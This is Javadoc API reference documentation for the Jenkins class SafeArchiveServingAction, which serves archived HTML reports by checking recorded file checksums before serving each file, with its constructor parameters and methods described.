Class SafeArchiveServingAction

  • All Implemented Interfaces:
    Action, ModelObject
    Direct Known Subclasses:
    SafeArchiveServingRunAction

    public class SafeArchiveServingAction
    extends Object
    implements Action
    This class implements a solution to serving various reports using JavaScript, Flash, etc. from Jenkins. By default, Jenkins serves static files using a restrictive Content-Security-Policy header to prevent malicious users from attacking other users of Jenkins by having Jenkins serve them maliciously manipulated files. This presents an obstacle to plugins that wish to archive known safe reports in HTML format and have Jenkins serve them. Examples include the Maven Site functionality in Maven Plugin, or the Javadoc Plugin. This class implements a safe alternative to serving files from DirectoryBrowserSupport: This action, when first attached, scans the specified directory and records all files' checksums. When later asked to serve files, it compares the actual and expected checksums, and only serves matching files.
    • Constructor Detail

      • SafeArchiveServingAction

        public SafeArchiveServingAction​(File rootDir,
                                        String urlName,
                                        String indexFile,
                                        String iconName,
                                        String title,
                                        String... safeExtensions)
        Create a safe archive serving action.
        Parameters:
        rootDir - The root directory to be served by this action
        urlName - The URL name used for this action
        indexFile - The file name of the index file to be served when accessing the urlName URL
        iconName - The icon used for the action in the side panel
        title - The title of this action in the side panel
        safeExtensions - The file extensions to be skipped from checksum recording and verification. These are file types whose unauthorized modification does not constitute a risk to users when viewed in a web browser. This should be resource file extensions like "gif" or "png" or file extensions of files not viewed in a browser like "zip" or "gz". Never specify file types possibly containing scripts or other possibly malicious data that can exploit users' browsers (html, js, swf, css, …).
    • Method Detail

      • processDirectory

        public void processDirectory()
                              throws NoSuchAlgorithmException,
                                     IOException
        Record the checksums of files in the specified directory and its descendants unless a file type is whitelisted as safe.
        Throws:
        NoSuchAlgorithmException - when the platform does unexpectedly not support SHA-1
        IOException - when the file or directory for specified file could not be created
      • getRootDir

        public File getRootDir()
      • doDynamic

        public org.kohsuke.stapler.HttpResponse doDynamic​(org.kohsuke.stapler.StaplerRequest req,
                                                          org.kohsuke.stapler.StaplerResponse rsp)
                                                   throws IOException,
                                                          javax.servlet.ServletException
        Throws:
        IOException
        javax.servlet.ServletException